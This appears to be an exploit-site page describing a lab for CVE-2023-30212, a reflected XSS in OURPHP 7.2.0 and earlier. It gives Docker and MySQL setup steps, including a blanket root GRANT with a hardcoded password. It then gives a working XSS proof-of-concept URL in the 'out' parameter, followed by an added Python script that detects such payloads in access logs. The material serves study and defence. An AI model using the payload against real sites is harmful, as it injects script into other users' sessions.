## https://sploitus.com/exploit?id=C96F7F94-2E5D-5A57-B19A-2F6DA8535C10
# Creating a Vulnerable Docker Environment (CVE-2023-30212)

## **Description**
CVE-2023-30212 is a security vulnerability that affects OURPHP versions prior to or equal to 7.2.0.
This vulnerability allows Cross-Site Scripting (XSS) attacks.

OURPHP <= 7.2.0 is vulnerable to Cross-Site Scripting (XSS) via /client/manage/ourphp_out.php.

## Steps

- **Let's download the Dockerfile**

- **Open a terminal in the folder where you downloaded the Dockerfile**

- **Install Docker on your machine**

  ```
  kali@kali:~$ sudo apt install -y docker.io
  ```

- **Create a new Docker image** (the trailing `.` is the build context, the folder containing the Dockerfile)

  ```
  kali@kali:~$ docker build -t test .
  ```

- **Create a new Docker container**

  ```
  kali@kali:~$ docker run -d -p 80:80 test
  ```
  
## Configure the web

- **Take a Docker shell**

  ```
  kali@kali:~$ docker ps
  ```

  **Now get the container id, e.g. 0ac7c99ad8e7, and open a shell in the container**

  ```
  kali@kali:~$ docker exec -it 0ac7c99ad8e7 /bin/bash
  root@0ac7c99ad8e7:/var/www/html#
  ```

- **Set up the database**

  ```
  root@0ac7c99ad8e7:/var/www/html# mysql
  ```

  **Then type these commands:**

  ```
  GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY 'naseef' WITH GRANT OPTION;
  FLUSH PRIVILEGES;
  ```

  *The GRANT statement is MySQL/MariaDB syntax: it gives the 'root' user connecting from localhost all privileges on every database and table, sets its password to 'naseef', and lets it pass those privileges on to other users. FLUSH PRIVILEGES reloads the grant tables so the change takes effect immediately.*

**Now the password is set; go to the website, enter the password and configure the site**
 
 
## Exploiting the vulnerability

URL:

```
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>
```

*The site is vulnerable to reflected XSS: the value of the `out` parameter is reflected into the response unescaped, so the injected script executes as soon as this URL is opened.*
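As an added example (not part of the original page or of OURPHP), the following script shows how a defender could spot attempts against this endpoint in web-server access logs: it parses combined-format log lines, picks out requests to `/client/manage/ourphp_out.php`, and flags any whose `out` parameter decodes to something containing an HTML tag. The log lines are constructed samples, and the log format and the `VULN_PATH` constant are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2023:10:00:01 +0000] "GET /client/manage/ourphp_out.php?ourphp_admin=logout&out=index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [01/May/2023:10:00:07 +0000] "GET /client/manage/ourphp_out.php?ourphp_admin=logout&out=%3C/script%3E%3Cscript%3Ealert(%60xss%60)%3C/script%3E HTTP/1.1" 200 512 "-" "curl/7.88.1"
10.0.0.9 - - [01/May/2023:10:00:09 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status code of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PATH = "/client/manage/ourphp_out.php"  # assumed: the affected script from the advisory
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.IGNORECASE)  # an opening or closing HTML tag


def suspicious_out_value(target):
    """Return the decoded `out` value if the request hits the affected script with an
    `out` parameter that contains an HTML tag; otherwise return None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs already percent-decodes once; decode a second time to catch
    # double-encoded payloads such as %253C.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("out", []):
        value = unquote(raw)
        if TAG_RE.search(value):
            return value
    return None


def scan_log(text):
    """Return one dict per log line that carries a suspicious `out` parameter."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        value = suspicious_out_value(m["target"])
        if value is not None:
            hits.append({"ip": m["ip"], "time": m["ts"], "status": m["status"], "out": value})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} status={hit['status']} out={hit['out']!r}")
```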